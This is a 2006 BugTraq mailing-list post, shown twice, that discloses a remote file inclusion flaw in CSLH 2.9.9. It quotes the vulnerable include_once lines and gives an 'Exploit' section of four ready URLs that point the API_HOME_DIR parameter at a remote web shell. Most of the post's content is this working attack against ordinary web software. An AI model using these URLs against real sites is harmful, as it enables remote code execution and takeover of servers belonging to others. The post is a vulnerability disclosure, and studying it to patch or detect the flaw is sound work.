BugTraq
Back to list
|
Post reply
CSLH2.9.9 Remote File Include Vulnerabilities
Oct 24 2006 03:33PM
crackers_child sibersavascilar com
#########################################################
CSLH2.9.9 Remote File Include Vulnerabilities
#########################################################
By Crackers_Child
crackers_child (at) sibersavascilar (dot) com [email concealed]
www.sibersavacilar.com
#########################################################
Download Script
http://craftysyntax.com/CSLH2.9.9.zip
#########################################################
#########################################################
Bug
include_once(API_HOME_DIR . "util.php");
include_once(API_HOME_DIR . "const.php");
include_once(API_HOME_DIR . "stringparser.php");
#########################################################
Exploit
#########################################################
www.site.com/CSLH2_path/txt-db-api/stringparser.php?API_HOME_DIR=sh3ll?
www.site.com/CSLH2_path/txt-db-api/util.php?API_HOME_DIR=sh3ll?
www.site.com/CSLH2_path/txt-db-api/sql.php?API_HOME_DIR=sh3ll?
www.site.com/CSLH2_path/txt-db-api/resultset.php?API_HOME_DIR=sh3ll?
#########################################################
Greetz:All My Friends !
#########################################################
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
CSLH2.9.9 Remote File Include Vulnerabilities
#########################################################
By Crackers_Child
crackers_child (at) sibersavascilar (dot) com [email concealed]
www.sibersavacilar.com
#########################################################
Download Script
http://craftysyntax.com/CSLH2.9.9.zip
#########################################################
#########################################################
Bug
include_once(API_HOME_DIR . "util.php");
include_once(API_HOME_DIR . "const.php");
include_once(API_HOME_DIR . "stringparser.php");
#########################################################
Exploit
#########################################################
www.site.com/CSLH2_path/txt-db-api/stringparser.php?API_HOME_DIR=sh3ll?
www.site.com/CSLH2_path/txt-db-api/util.php?API_HOME_DIR=sh3ll?
www.site.com/CSLH2_path/txt-db-api/sql.php?API_HOME_DIR=sh3ll?
www.site.com/CSLH2_path/txt-db-api/resultset.php?API_HOME_DIR=sh3ll?
#########################################################
Greetz:All My Friends !
#########################################################
[ reply ]